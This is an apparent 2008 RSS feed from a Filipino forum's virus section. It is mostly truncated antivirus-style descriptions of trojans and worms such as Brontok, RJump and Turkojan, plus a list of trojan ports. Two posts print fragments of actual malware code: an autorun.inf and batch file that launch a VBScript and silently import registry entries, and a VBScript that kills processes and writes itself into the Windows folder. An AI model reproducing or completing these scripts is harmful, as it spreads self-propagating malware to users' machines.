http://digosforumz.darkbb.com/mga-virus-f5/-t1.htm tungkol sa mga virus! Sun, 02 Mar 2008 10:38:20 GMT 10 http://hitskin.com/themes/12/97/68/i_logo.png http://digosforumz.darkbb.com/mga-virus-f5/-t1.htm http://digosforumz.darkbb.com/mga-virus-f5/backdoorrankyx-t49.htm wenzy18 Discovered: August 14, 2006 Updated: February 13, 2007 12:58:14 PM Type: Trojan Horse Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP When Backdoor.Ranky.X is executed, it performs the following actions: 1. Creates one of the following files: %Windir%\nrcs.exe %Windir%\mapping\svchost.exe %Windir%\security\svchost.exe %Windir%\config\svchost.exe Note: %Windir% is ... Mga Virus! Sun, 02 Mar 2008 10:38:20 GMT http://digosforumz.darkbb.com/mga-virus-f5/backdoorrankyx-t49.htm#68 http://digosforumz.darkbb.com/mga-virus-f5/backdoorrankyx-t49.htm http://digosforumz.darkbb.com/mga-virus-f5/w32-rjumpworm-t48.htm wenzy18 Overview - -- Update October 17, 2006 -- W32/RJump.worm has been deemed Low-Profiled due to media attention at http://www.betanews.com/article/Apple_Ships_iPods_with_Windows_Virus/1161112089 W32/Rjump.worm is a worm written using the Python scripting language and was converted into a windows portable executable file using the Py2Exe tool. It attempts to spread by coping itself to mapped and removable storage drives and also opens a backdoor on an infected system. Aliases ... Mga Virus! Sun, 02 Mar 2008 10:29:26 GMT http://digosforumz.darkbb.com/mga-virus-f5/w32-rjumpworm-t48.htm#67 http://digosforumz.darkbb.com/mga-virus-f5/w32-rjumpworm-t48.htm http://digosforumz.darkbb.com/mga-virus-f5/worm_onlinegdso-removal-t47.htm wenzy18 WORM_ONLINEG.DSO Removal Arrival, Installation and Autostart Technique This worm may be dropped by other malware. It may be downloaded unknowingly by a user when visiting malicious Web sites. Upon execution, this worm drops the following component files: * %System%\amvo.exe - copy of itself * %System%\amvo0.dll - also detected as WORM_ONLINEG.DSO * %System%\amvo1.dll - also detected as WORM_ONLINEG.DSO * %User Profile%\Local Settings\Temp\58.dll - also ... Mga Virus! Sun, 02 Mar 2008 10:21:46 GMT http://digosforumz.darkbb.com/mga-virus-f5/worm_onlinegdso-removal-t47.htm#66 http://digosforumz.darkbb.com/mga-virus-f5/worm_onlinegdso-removal-t47.htm http://digosforumz.darkbb.com/mga-virus-f5/mmabat-mmavbs-mmareg-virus-t46.htm wenzy18 Virus Code: autorun.inf [autorun] open= shell\open=Open(Sub7@Chatx.net) shell\open\Command=WScript.exe .\mma.vbs shell\open\Default=1 shell\explore=explore(Sub7@Chatx.net) shell\explore\Command=WScript.exe .\mma.vbs mma.bat @echo off if exist .\mma.reg regedit /s .\mma.reg if not "%1"=="" goto open if exist mma.vbs start WScript.exe mma.vbs&exit if exist %SYSTEMROOT%\system32\mma.vbs start WScript.exe %SYSTEMROOT%\system32\mma.vbs&exit exit :open if ... Mga Virus! Sun, 02 Mar 2008 10:18:40 GMT http://digosforumz.darkbb.com/mga-virus-f5/mmabat-mmavbs-mmareg-virus-t46.htm#65 http://digosforumz.darkbb.com/mga-virus-f5/mmabat-mmavbs-mmareg-virus-t46.htm http://digosforumz.darkbb.com/mga-virus-f5/fs6519dllvbs-t45.htm wenzy18 Code ng FS6519.dll.vbs virus: on error resume next Set wshshell=wscript.CreateObject("WScript.Shell") wshshell.Run "CMD /c TaskKill/F /im Wscript.exe /T" wshshell.Run "TaskKill/F /im Wscript.exe /T" Set fs=CreateObject("scripting.FileSystemObject") myWinPath=fs.getSpecialFolder(0) sFilePathAndName=myWinPath & "/FS6519.dll.vbs" If fs.FileExists(sFilePathAndName) = True Then mf=fs.CreateTextFile(sFilePathAndName,true) mf.attribute ... Mga Virus! Sun, 02 Mar 2008 10:15:23 GMT http://digosforumz.darkbb.com/mga-virus-f5/fs6519dllvbs-t45.htm#64 http://digosforumz.darkbb.com/mga-virus-f5/fs6519dllvbs-t45.htm http://digosforumz.darkbb.com/mga-virus-f5/trojan-ports-t23.htm wenzy18 Ports used by most trojan viruses and progs Good if your a TROJAN MAN!!!!! lol TCP 1 Breach.2001, SocketsDeTroie.230, SocketsDeTroie.250 TCP 28 Amanda.200 TCP 31 MastersParadise.920 TCP 68 Subseven.100 TCP 142 NetTaxi.180 TCP 146 Infector.141, Intruder.100, Intruder.100 TCP 171 ATrojan.200 TCP 285 WCTrojan.100 TCP 286 WCTrojan.100 TCP 334 Backage.310 TCP 370 NeuroticKat.120, NeuroticKat.130 TCP 413 Coma.109 TCP 420 Breach.450 TCP 555 Id2001.100, PhaseZero.100, ... Mga Virus! Sat, 01 Mar 2008 13:41:22 GMT http://digosforumz.darkbb.com/mga-virus-f5/trojan-ports-t23.htm#38 http://digosforumz.darkbb.com/mga-virus-f5/trojan-ports-t23.htm http://digosforumz.darkbb.com/mga-virus-f5/backdoorturkojan-t21.htm wenzy18 Discovered: March 28, 2003 Updated: February 13, 2007 11:45:02 AM Also Known As: BackDoor.Turkojan.10 [DrWeb], BackDoor-ARL [McAfee], Backdoor.Antilam.g1 [KAV] Type: Trojan Horse Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP Backdoor.Turkojan may be distributed in the form of a dropper. In this case, Symantec antivirus products should detect the dropper as Trojan dropper. When Backdoor.Turkojan runs, it performs the following actions: ... Mga Virus! Sat, 01 Mar 2008 13:26:48 GMT http://digosforumz.darkbb.com/mga-virus-f5/backdoorturkojan-t21.htm#32 http://digosforumz.darkbb.com/mga-virus-f5/backdoorturkojan-t21.htm http://digosforumz.darkbb.com/mga-virus-f5/w32autoexworm-t20.htm wenzy18 Discovered: November 13, 2003 Updated: February 13, 2007 12:13:39 PM Also Known As: Worm.Win32.Autex [AVP] Type: Worm Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP When W32.Autex.Worm runs, it does the following: 1. Enumerates drive letters and attempts to copy itself to them as Auto.exe. To run its copy on a remote computer, the worm creates an Autorun.inf file with the command: OPEN = auto.exe 2. Attempts ... Mga Virus! Sat, 01 Mar 2008 13:21:43 GMT http://digosforumz.darkbb.com/mga-virus-f5/w32autoexworm-t20.htm#31 http://digosforumz.darkbb.com/mga-virus-f5/w32autoexworm-t20.htm http://digosforumz.darkbb.com/mga-virus-f5/brontok-worm-t19.htm wenzy18 Discovered: September 23, 2005 Updated: January 2, 2008 3:59:55 PM Systems Affected: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows 2000 W32.Rontokbro@mm is a mass-mailing worm that causes system instability. When the worm is executed, it copies itself as: C:\Windows\PIF\CVT.exe %UserProfile%\APPDATA\IDTemplate.exe %UserProfile%\APPDATA\services.exe %UserProfile%\APPDATA\lsass.exe %UserProfile%\APPDATA\inetinfo.exe %UserProfile%\APPDATA\csrss.exe %UserProfile%\Programs\Startup\Empty.pif %UserProfile%\Templates\A.kotnorB.com %System%\3D ... Mga Virus! Sat, 01 Mar 2008 13:18:52 GMT http://digosforumz.darkbb.com/mga-virus-f5/brontok-worm-t19.htm#30 http://digosforumz.darkbb.com/mga-virus-f5/brontok-worm-t19.htm